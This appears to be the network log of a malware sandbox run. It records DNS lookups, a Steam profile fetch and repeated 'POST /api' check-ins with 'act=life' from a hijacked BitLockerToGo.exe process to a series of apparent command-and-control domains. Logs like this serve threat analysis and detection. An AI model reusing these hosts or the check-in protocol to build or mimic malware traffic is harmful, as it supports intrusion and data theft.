                                                                                                                Oct 13, 2024 12:00:37.288218975 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:37.288250923 CEST44349746172.67.206.204192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                Oct 13, 2024 12:00:26.773473024 CEST1.1.1.1192.168.2.40xfc5cNo error (0)proclaimykn.buzz188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:26.773473024 CEST1.1.1.1192.168.2.40xfc5cNo error (0)proclaimykn.buzz188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:28.072606087 CEST1.1.1.1192.168.2.40x5b6cNo error (0)mathcucom.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2024 12:00:28.072606087 CEST1.1.1.1192.168.2.40x5b6cNo error (0)mathcucom.sbs188.114.97.3A (IP address)IN (0x0001)false
Oct 13, 2024 12:00:29.026679993 CEST | 1.1.1.1 | 192.168.2.4 | 0x2ba8 | Name error (3) | allocatinow.sbs | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:29.064110041 CEST | 1.1.1.1 | 192.168.2.4 | 0xec7e | No error (0) | enlargkiw.sbs |  | 104.21.33.249 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:29.064110041 CEST | 1.1.1.1 | 192.168.2.4 | 0xec7e | No error (0) | enlargkiw.sbs |  | 172.67.152.13 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:30.092391968 CEST | 1.1.1.1 | 192.168.2.4 | 0x43bf | No error (0) | resinedyw.sbs |  | 104.21.77.78 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:30.092391968 CEST | 1.1.1.1 | 192.168.2.4 | 0x43bf | No error (0) | resinedyw.sbs |  | 172.67.205.156 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:31.009248972 CEST | 1.1.1.1 | 192.168.2.4 | 0xee47 | No error (0) | vennurviot.sbs |  | 172.67.140.193 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:31.009248972 CEST | 1.1.1.1 | 192.168.2.4 | 0xee47 | No error (0) | vennurviot.sbs |  | 104.21.46.170 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:31.996896029 CEST | 1.1.1.1 | 192.168.2.4 | 0xd70f | No error (0) | ehticsprocw.sbs |  | 172.67.173.224 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:31.996896029 CEST | 1.1.1.1 | 192.168.2.4 | 0xd70f | No error (0) | ehticsprocw.sbs |  | 104.21.30.221 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:32.994288921 CEST | 1.1.1.1 | 192.168.2.4 | 0xe04 | No error (0) | condifendteu.sbs |  | 104.21.79.35 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:32.994288921 CEST | 1.1.1.1 | 192.168.2.4 | 0xe04 | No error (0) | condifendteu.sbs |  | 172.67.141.136 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:33.964303017 CEST | 1.1.1.1 | 192.168.2.4 | 0xbd43 | No error (0) | drawwyobstacw.sbs |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:33.964303017 CEST | 1.1.1.1 | 192.168.2.4 | 0xbd43 | No error (0) | drawwyobstacw.sbs |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:34.154998064 CEST | 1.1.1.1 | 192.168.2.4 | 0xb1c9 | No error (0) | steamcommunity.com |  | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:35.629550934 CEST | 1.1.1.1 | 192.168.2.4 | 0xc89b | No error (0) | sergei-esenin.com |  | 172.67.206.204 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 12:00:35.629550934 CEST | 1.1.1.1 | 192.168.2.4 | 0xc89b | No error (0) | sergei-esenin.com |  | 104.21.53.8 | A (IP address) | IN (0x0001) | false
• proclaimykn.buzz
• mathcucom.sbs
• enlargkiw.sbs
• resinedyw.sbs
• vennurviot.sbs
• ehticsprocw.sbs
• condifendteu.sbs
• steamcommunity.com
• sergei-esenin.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 188.114.97.3 | 443 | 4564 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-13 10:00:27 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: proclaimykn.buzz
2024-10-13 10:00:27 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-13 10:00:28 UTC | 819 | IN | HTTP/1.1 200 OK
Date: Sun, 13 Oct 2024 10:00:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=6eh785990vvtnmum9fdesma51d; expires=Thu, 06 Feb 2025 03:47:06 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CLvQInTNF17sHTFrI15hpIm5bAI1BlZlEgPQOUtCnQeRnvWv2UM5b99k80LLJ%2F0QbDL1tm6gbZZ5Qjad74u1YZIukT6JqUfA1m%2F0Fs683%2FnZqsuXUxitkZUDO85bKDfMlcgl"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d1e7b94ea0e1869-EWR
alt-svc: h3=":443"; ma=86400
2024-10-13 10:00:28 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-13 10:00:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 188.114.96.3 | 443 | 4564 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-13 10:00:28 UTC | 260 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: mathcucom.sbs
2024-10-13 10:00:28 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-13 10:00:29 UTC | 815 | IN | HTTP/1.1 200 OK
Date: Sun, 13 Oct 2024 10:00:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=quhu9p75n7ft3059j9nnducup2; expires=Thu, 06 Feb 2025 03:47:07 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L2hPsZgi%2FJTBdM3FYp6bIaBnxYRCzSpx6CDwFAmehK2IkR7wm2y2d%2FlhvG7WyV8kNIN0FE0C3XCj4lGIJJa0hRFvyWysdRfGqx6XOTaNpBzkOiiAJhg%2FJphy0eKYnryQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d1e7b9b29041831-EWR
alt-svc: h3=":443"; ma=86400
2024-10-13 10:00:29 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-13 10:00:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 104.21.33.249 | 443 | 4564 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-13 10:00:29 UTC | 260 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: enlargkiw.sbs
2024-10-13 10:00:29 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-13 10:00:30 UTC | 819 | IN | HTTP/1.1 200 OK
Date: Sun, 13 Oct 2024 10:00:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hcrdtdhf1m22eppe15ma2jh697; expires=Thu, 06 Feb 2025 03:47:08 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AJ05BJHwuKfmNnjLDnWtUQWoRJ%2F4Ba%2FBDomfhbWkTYI3NDsQ0xEuP1kcI%2F1TfEU3bF1TURLvJRl0WheQykQxixrOOsseoLrpFsx%2B59Re5DCMvGM%2FZrmugx3Eb78X6e55"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d1e7ba1398d4316-EWR
alt-svc: h3=":443"; ma=86400
2024-10-13 10:00:30 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-13 10:00:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 104.21.77.78 | 443 | 4564 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-13 10:00:30 UTC | 260 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: resinedyw.sbs
2024-10-13 10:00:30 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-13 10:00:30 UTC | 819 | IN | HTTP/1.1 200 OK
Date: Sun, 13 Oct 2024 10:00:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=iaaelrhuqkfj8tf7u0c9fcoke3; expires=Thu, 06 Feb 2025 03:47:09 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv8%2Fqoy%2F7HvRd9kyzcFcNWrJtWAekylzc%2FY83V02y2lnyy3wlGq785qpUhxLlPmxtC9JtGxor0LOhG7pxOD16%2FBHPyIuLqyA79b929bAxX4OMDgY3%2BdVPCta2lD4hCM3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d1e7ba78bcd18f6-EWR
alt-svc: h3=":443"; ma=86400
2024-10-13 10:00:30 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-13 10:00:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 172.67.140.193 | 443 | 4564 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-13 10:00:31 UTC | 261 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: vennurviot.sbs
2024-10-13 10:00:31 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-13 10:00:31 UTC | 821 | IN | HTTP/1.1 200 OK
Date: Sun, 13 Oct 2024 10:00:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=p9ubmr8j13m5pk9c9jndtn5pdb; expires=Thu, 06 Feb 2025 03:47:10 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jW3%2B6GFeLMkUF2dmvwzOX99IFGIXJUCvCCq9Bsniy4SsNij5bkH8GgWqhcYJ%2BmnW0paqrRdzIorRUXYDrBFNekc0oSnyMFkN2WQshhzFcrKqVxtN8F4GC5uUpCLSgSI2JQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d1e7bad68c08c45-EWR
alt-svc: h3=":443"; ma=86400
2024-10-13 10:00:31 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-13 10:00:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.449741172.67.173.2244434564C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-13 10:00:32 UTC262OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: ehticsprocw.sbs
                                                                                                                2024-10-13 10:00:32 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-10-13 10:00:32 UTC823INHTTP/1.1 200 OK
                                                                                                                Date: Sun, 13 Oct 2024 10:00:32 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=ljndontpklbau2stdhr9nfd8oa; expires=Thu, 06 Feb 2025 03:47:11 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3NsRL0fqHa%2BJkifqdvDXWhzJ6RnB7hArEJUIogE1r8dk1ZznP5xSO6cw%2FLl8dEFvC%2BK6LitP0%2FQVFXc0lxmJqT0rixRNmIA45oO1vGXtuuzlQA66W4KP1e3XqO7tmPFgMGc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8d1e7bb37b7d4346-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                 2024-10-13 10:00:32 UTC | 15 bytes | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                Data Ascii: aerror #D12
                                                                                                                 2024-10-13 10:00:32 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                 6 | 192.168.2.4 | 49742 | 104.21.79.35 | 443 | 4564 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                 2024-10-13 10:00:33 UTC | 263 bytes | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: condifendteu.sbs
                                                                                                                 2024-10-13 10:00:33 UTC | 8 bytes | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                 2024-10-13 10:00:33 UTC | 819 bytes | IN | HTTP/1.1 200 OK
                                                                                                                Date: Sun, 13 Oct 2024 10:00:33 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=af78kgige2gb6463lvlpd06ma1; expires=Thu, 06 Feb 2025 03:47:12 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HbJ0YNBFpQQIatPdEt2RYZI2yFNYnSmE%2BYXT7sPwF1ik%2BQnG8gEBoxLhs2YH7T4SW1Muf6UDVRhTyWhEWT34qpfblbz0rwcEhpRz3gDxRNvPXEEmqjO7aL1gE7HJu5Rz%2BhqM"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8d1e7bb9bd9519d3-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                 2024-10-13 10:00:33 UTC | 15 bytes | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                Data Ascii: aerror #D12
                                                                                                                 2024-10-13 10:00:33 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                 7 | 192.168.2.4 | 49744 | 104.102.49.254 | 443 | 4564 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                 2024-10-13 10:00:34 UTC | 219 bytes | OUT | GET /profiles/76561199724331900 HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Host: steamcommunity.com
                                                                                                                 2024-10-13 10:00:35 UTC | 1870 bytes | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                Cache-Control: no-cache
                                                                                                                Date: Sun, 13 Oct 2024 10:00:35 GMT
                                                                                                                Content-Length: 34837
                                                                                                                Connection: close
                                                                                                                Set-Cookie: sessionid=d8a5315e6278e0fd2506466e; Path=/; Secure; SameSite=None
                                                                                                                Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                 2024-10-13 10:00:35 UTC | 14514 bytes | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                 2024-10-13 10:00:35 UTC | 16384 bytes | IN | Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                 2024-10-13 10:00:35 UTC | 3768 bytes | IN | Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                 2024-10-13 10:00:35 UTC | 171 bytes | IN | Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                 8 | 192.168.2.4 | 49745 | 172.67.206.204 | 443 | 4564 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                 2024-10-13 10:00:36 UTC | 264 bytes | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: sergei-esenin.com
                                                                                                                 2024-10-13 10:00:36 UTC | 8 bytes | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                 2024-10-13 10:00:36 UTC | 553 bytes | IN | HTTP/1.1 200 OK
                                                                                                                Date: Sun, 13 Oct 2024 10:00:36 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GpxYmnI6gY76Vm%2FBokmbyCcHK%2BTYmOeoEVw4DwezuaZexBRsSAcH2uW9wQgu5JcBZLEe3Q6WYkINIJNSjQYECOlNpZA5oo9PzJTrPbI53UIz%2Bz65gPgge7RTlUskkd4YN7T1XA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8d1e7bca3a1b80d0-EWR
